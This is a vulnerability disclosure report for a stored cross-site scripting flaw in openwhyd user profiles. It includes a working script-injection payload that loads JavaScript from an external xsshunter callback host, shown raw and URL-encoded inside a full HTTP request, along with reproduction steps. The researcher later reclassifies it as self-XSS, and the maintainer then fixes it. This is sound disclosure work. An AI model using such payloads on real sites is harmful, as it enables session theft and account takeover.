Cross-site Scripting (XSS) - Stored in openwhyd/openwhyd

Valid

Reported on

Oct 17th 2021

Overview

The openwhyd open-source application and openwhyd.org are vulnerable to a stored cross-site scripting vulnerability via user profiles. Malicious users can inject arbitrary javascript into the username setting on their profiles which, when visited by external users, would execute javascript in victim browsers. This is a serious vulnerability and should be triaged immediately to protect users.

Proof of Concept

payload in browser: John Doe "><script src=https://securepoint.xss.ht></script> payload in request: name=john+doe%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fsecurepoint.xss.ht%3E%3C%2Fscript%3E

POST /api/user HTTP/2
Host: openwhyd.org
Cookie: _ga=GA1.2.1710874691.1634429460; _gid=GA1.2.32803653.1634429460; cookieconsent_status=dismiss; whydSid=s%3ACvqf3Q9bbgPSn9TFbSIW5MGlgKrRMxlb.anmicGodGtyIqzLo0BPEXz0c%2BbUxjqptLCOPopLBaQY; _gat=1; _dd_s=rum=1&id=93cf7abc-e858-4a40-bd8c-71ecaa2215b9&created=1634429459651&expire=1634432938003
Content-Length: 147
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://openwhyd.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://openwhyd.org/koassqwh
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

name=john+doe%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fsecurepoint.xss.ht%3E%3C%2Fscript%3E&bio=&loc=&lnk_home=&lnk_fb=&lnk_tw=&lnk_sc=&lnk_yt=&lnk_igrm=

Steps to Reproduce

  1. Go to User profile https://openwhyd.org/[username]
  2. Click edit profile then edit profile info
  3. Enter payload into name field. This PoC uses an xsshunter payload to automatically get a call-back of when the payload triggers. The payload used was john doe"><script src=https://securepoint.xss.ht></script>
  4. Save
  5. reload the profile, https://openwhyd.org/[username]
  6. The payload will execute

The vulnerable component is the user profile badge and name field, located at the top right of the page

Impact

This is a severe vulnerability. Malicious users can create profiles with embedded payloads, send links to target victims, and have their arbitrary javascript execute in victim browsers. Payloads could be crafted to steal authentication cookies and session information, such as whydSid, which could lead to complete account takeover.

We have contacted a member of the openwhyd team and are waiting to hear back 2 years ago
Tyler Butler
2 years ago

Researcher

I just noticed, this is apparently a self XSS, the payload executes on https://openwhyd.org/[user] only when that [user] is logged in. The vulnerable component is not used when a victim opens a vulnerable https://openwhyd.org/[user] profile because the component is used as the "logged in" user's avatar. It's still likely the same logic was used elsewhere in the application

Tyler Butler modified the report
2 years ago
Adrien Joly validated this vulnerability 2 years ago
Tyler Butler has been awarded the disclosure bounty
The fix bounty is now up for grabs
Adrien Joly
2 years ago

Maintainer

Thank you for reporting, Tyler, and for the precise explanation of the problem + steps to reproduce it! Would you be interested in submitting a fix through a pull request?

Adrien Joly marked this as fixed in 1.45.5 with commit 14e0d4 2 years ago
Adrien Joly has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation